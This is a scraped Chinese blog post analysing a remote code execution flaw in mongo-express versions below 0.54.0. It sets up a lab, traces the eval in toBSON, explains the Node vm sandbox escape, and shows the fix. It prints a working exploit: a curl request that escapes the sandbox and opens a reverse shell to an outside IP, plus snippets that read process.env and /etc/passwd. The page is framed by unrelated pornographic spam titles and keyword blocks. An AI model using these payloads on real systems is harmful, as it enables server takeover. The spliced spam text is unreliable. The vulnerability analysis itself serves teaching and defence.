欧美一级特黄大片做受成人-亚洲成人一区二区电影-激情熟女一区二区三区-日韩专区欧美专区国产专区

遠程代碼執(zhí)行漏洞實例分析

今天給大家介紹一下遠程代碼執(zhí)行漏洞實例分析。文章的內(nèi)容小編覺得不錯,現(xiàn)在給大家分享一下,覺得有需要的朋友可以了解一下,希望對大家有所幫助,下面跟著小編的思路一起來閱讀吧。

專注于為中小企業(yè)提供成都網(wǎng)站設(shè)計、做網(wǎng)站、成都外貿(mào)網(wǎng)站建設(shè)公司服務(wù),電腦端+手機端+微信端的三站合一,更高效的管理,為中小企業(yè)金門免費做網(wǎng)站提供優(yōu)質(zhì)的服務(wù)。我們立足成都,凝聚了一批互聯(lián)網(wǎng)行業(yè)人才,有力地推動了千余家企業(yè)的穩(wěn)健成長,幫助中小企業(yè)通過網(wǎng)站建設(shè)實現(xiàn)規(guī)模擴充和轉(zhuǎn)變。

0x01 認(rèn)識 mongo-express

mongo-express是一個MongoDB的Admin Web管理界面,使用NodeJS、Express、Bootstrap3編寫而成。目前mongo-express應(yīng)該是Github上Star最多的MongoDB admin管理界面。部署方便,使用簡單,成為了很多人管理mongo的選擇。

遠程代碼執(zhí)行漏洞實例分析

0x02 調(diào)試環(huán)境搭建

0x1 啟動docker服務(wù)

閱讀官方GitHub的安全公告,我們發(fā)現(xiàn)漏洞影響0.54.0以下的所有版本。選擇以0.49為例進行測試,由于此漏洞環(huán)境還需要MongoDB數(shù)據(jù)庫,我們可以通過執(zhí)行以下docker命令進行快速搭建:

  • 搭建MongoDB數(shù)據(jù)庫

docker run --name test -d mongo:3.2

  • 搭建包含漏洞的mongo-express并且連接到上面的MongoDB數(shù)據(jù)庫:

docker run -d -p 8081:8081  --link test:mongo mongo-express:0.49

查看日志,確認(rèn)連接成功。

遠程代碼執(zhí)行漏洞實例分析

0x2 開啟nodejs調(diào)試選項

這里需要個技巧,如果要調(diào)試nodejs 需要在啟動的時候加上 --inspect 參數(shù)。 在docker啟動腳本做以下修改

遠程代碼執(zhí)行漏洞實例分析

docker restart 183

利用docker exec -it 183 bash連接docker查看debug服務(wù)是否開啟

遠程代碼執(zhí)行漏洞實例分析

如上圖中開啟9229端口即可。只需要外面主機能夠連接訪問9229端口就可以利用chrome插件進行調(diào)試,可以用frp將端口轉(zhuǎn)發(fā)出來,或者利用docker -p 9229:9229參數(shù)做處理。

0x3 Chrome DevTools

利用chrome 插件可以實現(xiàn)像調(diào)試javascript腳本一樣調(diào)試nodejs,操作起來也是很方便。

首先下載debug插件

遠程代碼執(zhí)行漏洞實例分析

在chrome打開about:inspect chrome devtools在2016年5月就已經(jīng)支持Nodejs的調(diào)試,點擊Open dedicated DevTools for Node

遠程代碼執(zhí)行漏洞實例分析

配置連接地址和端口

遠程代碼執(zhí)行漏洞實例分析

接下來就像調(diào)試js一樣了

遠程代碼執(zhí)行漏洞實例分析

發(fā)送一個測試包,該路由分支可以斷下,接下來就開始調(diào)試本次漏洞了。



curl http://127.0.0.1:8081/checkValid -d 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("bash -i >& /dev/tcp/192.168.43.176/8003 0>&1 2>&1")'

遠程代碼執(zhí)行漏洞實例分析

0x03 漏洞調(diào)試及原理分析

本次調(diào)試的漏洞原理比較簡單,核心漏洞是命令拼接,這是一種最簡單的漏洞形式,但是利用起來需要點功夫,因為需要繞過沙箱VM,好在nodejs的vm繞過有過研究基礎(chǔ)。多的不說,直接看最后的漏洞代碼

遠程代碼執(zhí)行漏洞實例分析

string為toBSON的參數(shù),在MongoDB中BSON是一種常見的數(shù)據(jù)格式,與JSON是近親,但是和JSON的數(shù)據(jù)格式有很多區(qū)別,而然在mongo-express中的所有和BSON相關(guān)的操作,如新建一個文檔(類似其他數(shù)據(jù)庫的插入操作)都需要通過toBSON()函數(shù)。

例如下面操作

遠程代碼執(zhí)行漏洞實例分析

當(dāng)代碼流程走到bson.toBSON時會觸發(fā)eval函數(shù),因為nodejs可以作為后端語言所以該eval函數(shù)是在服務(wù)器端運行,可以造成命令注入,對系統(tǒng)產(chǎn)生危害。



exp.checkValid = function (req, res) {var doc = req.body.document;try {  bson.toBSON(doc);} catch (err) {  console.error(err);  return res.send('Invalid');}res.send('Valid');  };


exports.toBSON = function (string) {  var sandbox = exports.getSandbox();  string = string.replace(/ISODate\(/g, 'new ISODate(');  string = string.replace(/Binary\(("[^"]+"),/g, 'Binary(new Buffer($1, "base64"),');  vm.runInNewContext('doc = eval((' + string + '));', sandbox);  return sandbox.doc;};

由代碼溯源分析得到,toBSON的參數(shù)string是req.body中的document,因此這一部分我們可控。可以發(fā)現(xiàn)vm.runInNewContext函數(shù),這是一個虛擬沙箱。因此們下一節(jié)分析怎么繞過沙箱防護。

0x04 nodejs 沙箱繞過

沙箱是一個能夠安全執(zhí)行不受信任的代碼,且不影響外部實際代碼的獨立環(huán)境。在沙箱里代碼執(zhí)行往往會被限制。VM模塊提供在VM虛擬機上下文中編譯運行代碼的API。使用VM模塊可以在沙箱環(huán)境中運行代碼。運行的代碼使用不同的V8上下文,也就是它的全局變量不同于其他代碼。但是沙箱里的代碼仍然可以訪問Node進程。我們經(jīng)常使用該方法去繞過。

0x1 現(xiàn)象

vm.js



"use strict";const vm = require("vm");const xyz = vm.runInNewContext(`this.constructor.constructor('return this.process.env')()`);console.log(xyz);

遠程代碼執(zhí)行漏洞實例分析

可以看到this.process.env獲取到了nodejs進程的信息,這說明完全可以切回主程序去執(zhí)行系統(tǒng)命令。

0x2 解釋

在javascript中this指向它所屬的對象,所以我們使用它時就已經(jīng)指向了一個VM上下文之外的對象。那么訪問this的 .constructor 就返回 Object Constructor ,訪問 Object Constructor 的 .constructor 返回 Function constructor 。 Function constructor 就像javascript里的最高函數(shù)它允許全局訪問。Function constructor允許從字符串生成函數(shù),從而執(zhí)行任意代碼。所以我們可以利用它返回主進程。之后我們就能用它來訪問主進程,然后進行RCE。



"use strict";const vm = require("vm");const xyz = vm.runInNewContext(`const process = this.constructor.constructor('return this.process')(); process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);console.log(xyz);

同理vm2 函數(shù)也可以繞過,這里還是參照原文進行學(xué)習(xí)吧  https://pwnisher.gitlab.io/nodejs/sandbox/2019/02/21/sandboxing-nodejs-is-hard.html

0x05 漏洞修補

遠程代碼執(zhí)行漏洞實例分析

遠程代碼執(zhí)行漏洞實例分析

這里放兩個圖可以說明一切,利用mongo-query-parser 去解析BSON數(shù)據(jù),直接從根源替換。

以上就是遠程代碼執(zhí)行漏洞實例分析的全部內(nèi)容了,更多與遠程代碼執(zhí)行漏洞實例分析相關(guān)的內(nèi)容可以搜索創(chuàng)新互聯(lián)之前的文章或者瀏覽下面的文章進行學(xué)習(xí)哈!相信小編會給大家增添更多知識,希望大家能夠支持一下創(chuàng)新互聯(lián)!

名稱欄目:遠程代碼執(zhí)行漏洞實例分析
當(dāng)前網(wǎng)址:http://aaarwkj.com/article46/giphhg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供微信小程序、全網(wǎng)營銷推廣標(biāo)簽優(yōu)化、企業(yè)網(wǎng)站制作網(wǎng)站收錄、云服務(wù)器

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

網(wǎng)站建設(shè)網(wǎng)站維護公司
国产一区 亚洲精品| 在线观看亚洲av日韩av| 欧美激情网页一区三区| 国产欧美日韩精品三级| 亚洲精品国产精品乱码| 亚洲欧洲av男人的天堂| 蜜臀av成人精品蜜臀av| 亚洲黄色av电影在线| 午夜福利激情视频在线| 日韩精品熟女中文字幕| 天天操天天射夜夜爽| 中文字幕中文字幕乱码| 少妇特黄a一区二区三区| 亚洲精品丝袜成人偷拍| 亚洲欧洲另类美女久久精品| 久久久国产精品久久久| 天堂中文字幕在线乱码一区| 成人爱爱在线视频免费观看| 国产乱人伦真实精品视频| 粉嫩av蜜臀一区二区三区| 亚洲最新一区二区在线观看| 国产又猛又黄又爽无遮挡| 久久国产精品成人av| 性感美女国产av一区二区三区| 91午夜福利视频免费播放| 日本免费精品人成视频| 久久久久亚洲av成人网人| 中文字幕一区二区不卡顿| 成人精品国产亚洲av| 91亚洲欧美日韩在线观看| 久久好大好爽要死了欧美| 日本日韩一区二区国产| 能在线播放的国产三级| 日韩一区中文字幕久久| 欧美精品黑人三级精品| 97精品国产高清在线| 欧美三级高清视频在线播放| 久国产精品久久久极品| 精品毛片在线播放网站不卡| 中文字幕制服国产精品| 美女被强到爽高潮不断在线|